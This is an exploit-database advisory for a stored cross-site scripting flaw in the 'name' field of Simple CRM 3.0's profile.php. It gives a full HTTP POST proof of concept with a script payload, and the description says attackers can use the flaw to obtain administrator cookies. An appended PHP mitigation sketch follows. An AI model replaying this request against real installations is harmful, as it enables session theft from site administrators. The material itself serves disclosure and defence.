## https://sploitus.com/exploit?id=PACKETSTORM:163221
# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)  
# Date: 20/06/2021  
# Exploit Author: Riadh Benlamine (rbn0x00)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/small-crm-php/  
# Version: 3.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.  
  
Vulnerable page: /crm/profile.php  
  
POC:  
----  
POST /crm/profile.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------386571683933745493952831205283  
Content-Length: 779  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/crm/profile.php  
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1  
Upgrade-Insecure-Requests: 1  
  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="name"  
  
<script>alert('xss')</script>  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="alt_email"  
  
  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="phone"  
  
0123456789  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="gender"  
  
m  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="address"  
  
  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="update"  
  
Update  
-----------------------------386571683933745493952831205283--
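
Mitigation sketch (added example, not part of the original advisory and not Simple CRM's own code): the stored `name` value must be HTML-encoded wherever it is rendered, and the `PHPSESSID` cookie should be marked HttpOnly so an injected script cannot read it. The function names are hypothetical, the page does not show how profile.php outputs the field, and the array form of `session_set_cookie_params()` assumes PHP 7.3 or later.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: Simple CRM's real rendering code is not shown
// in the advisory, so these only illustrate the pattern.

// Vulnerable pattern: the stored value goes into the page verbatim, so
// markup saved through the "name" field runs in the browser of every
// user (including an administrator) who views the record.
function render_name_vulnerable(string $storedName): string
{
    return '<td>' . $storedName . '</td>';
}

// Hardened pattern: encode at output time for the HTML body context.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function render_name_hardened(string $storedName): string
{
    $safe = htmlspecialchars($storedName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td>' . $safe . '</td>';
}

// Defence in depth for the cookie the advisory says can be obtained:
// HttpOnly hides PHPSESSID from document.cookie. Call this before any
// output, in place of a bare session_start().
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // assumption: the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed sample: the value submitted in the PoC's "name" part.
$stored = "<script>alert('xss')</script>";

echo 'vulnerable: ' . render_name_vulnerable($stored) . PHP_EOL;
echo 'hardened:   ' . render_name_hardened($stored) . PHP_EOL;
```

HttpOnly limits cookie theft only; output encoding is what removes the script execution itself.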